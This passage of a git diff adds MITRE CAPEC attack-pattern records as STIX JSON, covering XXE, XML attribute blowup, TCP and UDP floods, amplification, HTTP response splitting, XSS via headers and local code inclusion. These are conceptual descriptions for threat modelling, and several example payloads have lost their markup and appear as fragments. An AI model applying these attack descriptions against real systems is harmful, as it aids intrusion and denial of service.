"http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "An attacker develops co-processor boards with malicious capabilities that are technically the same as a manufacturer's expensive upgrade to their flagship system. The victim has installed the manufacturer's base system without the expensive upgrade. The attacker contacts the victim and states they have the co-processor boards at a drastically-reduced price, falsely stating they were acquired from a bankruptcy liquidation of a company that had purchased them from the manufacturer. The victim after hearing the drastically reduced price decides to take advantage of the situation and purchases the upgrades from the attacker, and installs them. This allows the attacker to further compromise the victim." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to a gray market reseller's hardware components supply, or the ability to appear as a gray market reseller to the victim's buyer." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ead85fd7-2a41-402e-ab02-e20fad3ceb94.json b/capec/attack-pattern/attack-pattern--ead85fd7-2a41-402e-ab02-e20fad3ceb94.json new file mode 100644 index 0000000000..8e44ca694b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ead85fd7-2a41-402e-ab02-e20fad3ceb94.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--bef12f86-7547-44ea-9405-21176577fe3f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ead85fd7-2a41-402e-ab02-e20fad3ceb94", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DNS Domain Seizure", + "description": "In this attack pattern, an adversary influences a target's web-hosting company to disables a target domain. The goal is to prevent access to the targeted service provided by that domain. It usually occurs as the result of civil or criminal legal interventions.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/585.html", + "external_id": "CAPEC-585" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Dozens of Online 'Dark Markets' Seized Pursuant to Forfeiture Complaint Filed in Manhattan Federal Court in Conjunction with the Arrest of the Operator of Silk Road 2.0, 2014, FBI", + "url": "https://www.fbi.gov/contact-us/field-offices/newyork/news/press-releases/dozens-of-online-dark-markets-seized-pursuant-to-forfeiture-complaint-filed-in-manhattan-federal-court-in-conjunction-with-the-arrest-of-the-operator-of-silk-road-2.0", + "external_id": "REF-467" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a target domain at the infrastructure level denies the availability of its service to the user.)" + ] + }, + "x_capec_example_instances": [ + "The FBI's seizure of gambling websites, the US DOJ's seizure of child pornography websites, and Microsoft's seizure of all domains owned by the company No-IP in order to disrupt a cyberattack originating from a subset of those domains." + ], + "x_capec_prerequisites": [ + "This attack pattern requires that the adversary has cooperation from the registrar of the target domain." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--eb7ef8dd-05d4-4a86-8188-183c7613740e.json b/capec/attack-pattern/attack-pattern--eb7ef8dd-05d4-4a86-8188-183c7613740e.json new file mode 100644 index 0000000000..8f33308e3b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--eb7ef8dd-05d4-4a86-8188-183c7613740e.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--d2593612-81a3-4520-a04e-0a2b9a948773", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--eb7ef8dd-05d4-4a86-8188-183c7613740e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XML Entity Linking", + "description": "An attacker creates an XML document that contains an external entity reference. External entity references can take the form of tags in a DTD. Because processors may not validate documents with external entities, there may be no checks on the nature of the reference in the external entity. This can allow an attacker to open arbitrary files or connections.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/201.html", + "external_id": "CAPEC-201" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html", + "external_id": "CWE-829" + }, + { + "source_name": "reference_from_CAPEC", + "description": "XXE (Xml eXternal Entity) Attack, Beyond Security", + "url": "http://www.securiteam.com/securitynews/6D0100A5PU.html", + "external_id": "REF-73" + }, + { + "source_name": "reference_from_CAPEC", + "description": "CESA-2007-002 - rev 2: Sun JDK6 breaks XXE attack protection", + "url": "http://scary.beasts.org/security/CESA-2007-002.html", + "external_id": "REF-74" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "\n The following DTD would attempt to open the /dev/tty device:\n ]>\n A malicious actor could use this crafted DTD to reveal sensitive information.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target must follow external entity references without validating the validity of the reference target." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "To send XML messages with maliciously crafted DTDs." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--eca65a23-cc6f-4bd9-ba21-e64510a66038.json b/capec/attack-pattern/attack-pattern--eca65a23-cc6f-4bd9-ba21-e64510a66038.json new file mode 100644 index 0000000000..b812998299 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--eca65a23-cc6f-4bd9-ba21-e64510a66038.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--716dd486-3157-4539-9f68-d797602c3da4", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--eca65a23-cc6f-4bd9-ba21-e64510a66038", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "XML Attribute Blowup", + "description": "This attack exploits certain XML parsers which manage data in an inefficient manner. The attacker crafts an XML document with many attributes in the same XML node. In a vulnerable parser, this results in a denial of service condition owhere CPU resources are exhausted because of the parsing algorithm.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/229.html", + "external_id": "CAPEC-229" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "\n In this example, assume that the victim is running a vulnerable parser such as .NET framework 1.0. This results in a quadratic runtime of O(n^2).\n \n A document with n attributes results in (n^2)/2 operations to be performed. If an operation takes 100 nanoseconds then a document with 100,000 operations would take 500s to process. In this fashion a small message of less than 1MB causes a denial of service condition on the CPU resources.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The server accepts XML input and is using a parser with a runtime longer than O(n) for the insertion of a new attribute in the data container.(examples are .NET framework 1.0 and 1.1)" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ecbfaa5c-9426-4e2e-9621-4c12bfafbe95.json b/capec/attack-pattern/attack-pattern--ecbfaa5c-9426-4e2e-9621-4c12bfafbe95.json new file mode 100644 index 0000000000..146f919229 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ecbfaa5c-9426-4e2e-9621-4c12bfafbe95.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--6fb7eefb-16ce-42b7-923f-ce037808a20c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ecbfaa5c-9426-4e2e-9621-4c12bfafbe95", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "TCP Flood", + "description": "An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/482.html", + "external_id": "CAPEC-482" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ed1f6abe-8e7c-4556-a7fc-66a2842201f8.json b/capec/attack-pattern/attack-pattern--ed1f6abe-8e7c-4556-a7fc-66a2842201f8.json new file mode 100644 index 0000000000..3be5c30485 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ed1f6abe-8e7c-4556-a7fc-66a2842201f8.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--2c593802-8485-4eed-a1ce-ab76ea1196c7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ed1f6abe-8e7c-4556-a7fc-66a2842201f8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Local Code Inclusion", + "description": "The attacker forces an application to load arbitrary code files from the local machine. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/251.html", + "external_id": "CAPEC-251" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html", + "external_id": "CWE-829" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (An attacker may leverage local code inclusion in order to print sensitive data to a page, such as hidden configuration files or or password hashes.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Through local code inclusion, the adversary compromises the integrity of the application.)" + ] + }, + "x_capec_prerequisites": [ + "The targeted application must have a bug that allows an adversary to control which code file is loaded at some juncture.", + "Some variants of this attack may require that old versions of some code files be present and in predictable locations." + ], + "x_capec_resources_required": [ + "The adversary needs to have enough access to the target application to control the identity of a locally included file. The attacker may also need to be able to upload arbitrary code files to the target machine, although any location for these files may be acceptable." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ed51bcb1-2870-463d-accc-eb68408be81a.json b/capec/attack-pattern/attack-pattern--ed51bcb1-2870-463d-accc-eb68408be81a.json new file mode 100644 index 0000000000..f03daa2a3e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ed51bcb1-2870-463d-accc-eb68408be81a.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--8bb60b9b-77b8-45f6-82c1-b1de01402c9b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ed51bcb1-2870-463d-accc-eb68408be81a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Amplification", + "description": "An adversary may execute an amplification where the size of a response is far greater than that of the request that generates it. The goal of this attack is to use a relatively few resources to create a large amount of traffic against a target server. To execute this attack, an adversary send a request to a 3rd party service, spoofing the source address to be that of the target server. The larger response that is generated by the 3rd party service is then sent to the target server. By sending a large number of initial requests, the adversary can generate a tremendous amount of traffic directed at the target. The greater the discrepancy in size between the initial request and the final payload delivered to the target increased the effectiveness of this attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/490.html", + "external_id": "CAPEC-490" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This type of an attack requires the existence of a 3rd party service that generates a response that is significantly larger than the request that triggers it." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ed57547f-e8aa-466e-8be4-a9ecca5a100a.json b/capec/attack-pattern/attack-pattern--ed57547f-e8aa-466e-8be4-a9ecca5a100a.json new file mode 100644 index 0000000000..865720f007 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ed57547f-e8aa-466e-8be4-a9ecca5a100a.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--28e4f28b-6e0f-40ba-9f47-8ec4dd4d89fc", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ed57547f-e8aa-466e-8be4-a9ecca5a100a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Micro-Expressions", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/430.html", + "external_id": "CAPEC-430" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ed658e2d-79ca-4953-a56b-3866cce3684a.json b/capec/attack-pattern/attack-pattern--ed658e2d-79ca-4953-a56b-3866cce3684a.json new file mode 100644 index 0000000000..2a2801801e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ed658e2d-79ca-4953-a56b-3866cce3684a.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--c924cb29-1c29-4f45-98ed-7a54e6a23e2a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ed658e2d-79ca-4953-a56b-3866cce3684a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "UDP Flood", + "description": "An adversary may execute a flooding attack using the UDP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. Additionally, firewalls often open a port for each UDP connection destined for a service with an open UDP port, meaning the firewalls in essence save the connection state thus the high packet nature of a UDP flood can also overwhelm resources allocated to the firewall. UDP attacks can also target services like DNS or VoIP which utilize these protocols. Additionally, due to the session-less nature of the UDP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/486.html", + "external_id": "CAPEC-486" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of UDP traffic to send to the desired port of a target service using UDP." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ee3a115d-a03f-47db-b64c-d42b8b5006c2.json b/capec/attack-pattern/attack-pattern--ee3a115d-a03f-47db-b64c-d42b8b5006c2.json new file mode 100644 index 0000000000..06d109feae --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ee3a115d-a03f-47db-b64c-d42b8b5006c2.json @@ -0,0 +1,93 @@ +{ + "type": "bundle", + "id": "bundle--5d36cc96-0d75-415f-a55a-7249757b1ccf", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ee3a115d-a03f-47db-b64c-d42b8b5006c2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "HTTP Response Splitting", + "description": "This attack uses a maliciously-crafted HTTP request in order to cause a vulnerable web server to respond with an HTTP response stream that will be interpreted by the client as two separate responses instead of one. This is possible when user-controlled input is used unvalidated as part of the response headers. The target software, the client, will interpret the injected header as being a response to a second request, thereby causing the maliciously-crafted contents be displayed and possibly cached.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/34.html", + "external_id": "CAPEC-34" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html", + "external_id": "CWE-113" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "In the PHP 5 session extension mechanism, a user-supplied session ID is sent back to the user within the Set-Cookie HTTP header. Since the contents of the user-supplied session ID are not validated, it is possible to inject arbitrary HTTP headers into the response body. This immediately enables HTTP Response Splitting by simply terminating the HTTP response header from within the session ID used in the Set-Cookie directive. See also: CVE-2006-0207" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "User-controlled input used as part of HTTP header", + "Ability of adversary to inject custom strings in HTTP header", + "Insufficient input validation in application to check for input sanity before using it as part of response header" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The adversary needs to have a solid understanding of the HTTP protocol and HTTP headers and must be able to craft and inject requests to elicit the split responses." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ee680af9-b2da-44fc-a254-2c2925ffe18e.json b/capec/attack-pattern/attack-pattern--ee680af9-b2da-44fc-a254-2c2925ffe18e.json new file mode 100644 index 0000000000..d8ded3fa7d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ee680af9-b2da-44fc-a254-2c2925ffe18e.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--b119b3bb-8742-4b55-a9c6-3d5d80d11e9a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ee680af9-b2da-44fc-a254-2c2925ffe18e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Hiding Malicious Data or Code within Files", + "description": "Files on various operating systems can have a complex format which allows for the storage of other data, in addition to its contents. Often this is metadata about the file, such as a cached thumbnail for an image file. Unless utilities are invoked in a particular way, this data is not visible during the normal use of the file. It is possible for an attacker to store malicious data or code using these facilities, which would be difficult to discover.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/636.html", + "external_id": "CAPEC-636" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Means, Ryan L., Alternate Data Streams: Out of the Shadows and into the Light, SANS Institute", + "url": "https://www.giac.org/paper/gcwn/230/alternate-data-streams-shadows-light/104234", + "external_id": "REF-493" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The operating system must support a file system that allows for alternate data storage for a file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ef08989b-f858-4f19-b57e-95a9e5ab11bd.json b/capec/attack-pattern/attack-pattern--ef08989b-f858-4f19-b57e-95a9e5ab11bd.json new file mode 100644 index 0000000000..943be1e321 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ef08989b-f858-4f19-b57e-95a9e5ab11bd.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--9e784602-568a-4b90-8d3d-7bfe4e43015a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ef08989b-f858-4f19-b57e-95a9e5ab11bd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "UDP Fragmentation", + "description": "An attacker may execute a UDP Fragmentation attack against a target server in an attempt to consume resources such as bandwidth and CPU. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. Typically the attacker will use large UDP packets over 1500 bytes of data which forces fragmentation as ethernet MTU is 1500 bytes. This attack is a variation on a typical UDP flood but it enables more network bandwidth to be consumed with fewer packets. Additionally it has the potential to consume server CPU resources and fill memory buffers associated with the processing and reassembling of fragmented packets.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/495.html", + "external_id": "CAPEC-495" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html", + "external_id": "CWE-404" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Yossi Gilad, Amir Herzberg, Fragmentation Considered Vulnerable, 2012", + "url": "http://u.cs.biu.ac.il/~herzbea/security/12-03%20fragmentation.pdf", + "external_id": "REF-424" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This type of an attack requires the attacker to be able to generate fragmented IP traffic containing crafted data." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1.json b/capec/attack-pattern/attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1.json new file mode 100644 index 0000000000..c5ea555901 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1.json @@ -0,0 +1,87 @@ +{ + "type": "bundle", + "id": "bundle--b27356e7-48f9-4d2e-93b3-ef3d902bf536", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "XSS Through HTTP Headers", + "description": "An adversary exploits web applications that generate web content, such as links in a HTML page, based on unvalidated or improperly validated data submitted by other actors. XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/86.html", + "external_id": "CAPEC-86" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/80.html", + "external_id": "CWE-80" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Cheatsheets, The Open Web Application Security Project (OWASP)", + "url": "http://ha.ckers.org/xss.html", + "external_id": "REF-97" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Watchfire Research, XSS vulnerabilities in Google.com, Full Disclosure mailing list archives", + "url": "http://seclists.org/fulldisclosure/2005/Dec/1107", + "external_id": "REF-476" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n Utilize a remote style sheet set in the HTTP header for XSS attack. When the attacker is able to point to a remote stylesheet, any of the variables set in that stylesheet are controllable on the client side by the remote attacker. Like most XSS attacks, results vary depending on browser that is used.\n ; REL=stylesheet\">\n [R.86.2]\n ", + "\n Google's 404 redirection script was found vulnerable to this attack vector.\n Google's 404 file not found page read\n * Response headers: \"Content-Type: text/html; charset=[encoding]\".\n * Response body: \n If the response sends an unexpected encoding type such as UTF-7, then no enforcement is done on the payload and arbitrary XSS code will be transported along with the standard HTTP response. [R.86.3]\n ", + "XSS can be used in variety of ways, because it is scripted and executes in a distributed, asynchronous fashion it can create its own vector and openings. For example, the attacker can use XSS to mount a DDoS attack by having series of different computers unknowingly executing requests against a single host." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software must be a client that allows scripting communication from remote hosts." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to deploy a custom hostile service for access by targeted clients and the abbility to communicate synchronously or asynchronously with client machine. The adversary must also control a remote site of some sort to redirect client and data to." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an attacker can simply edit HTTP Headers that are sent to client machine." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b.json b/capec/attack-pattern/attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b.json new file mode 100644 index 0000000000..e789b23167 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b.json @@ -0,0 +1,110 @@ +{ + "type": "bundle", + "id": "bundle--c3215eb9-298a-4e9d-9d70-d371c2ba5502", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Subverting Environment Variable Values", + "description": "The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/13.html", + "external_id": "CAPEC-13" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html", + "external_id": "CWE-353" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html", + "external_id": "CWE-302" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html", + "external_id": "CWE-15" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html", + "external_id": "CWE-73" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection 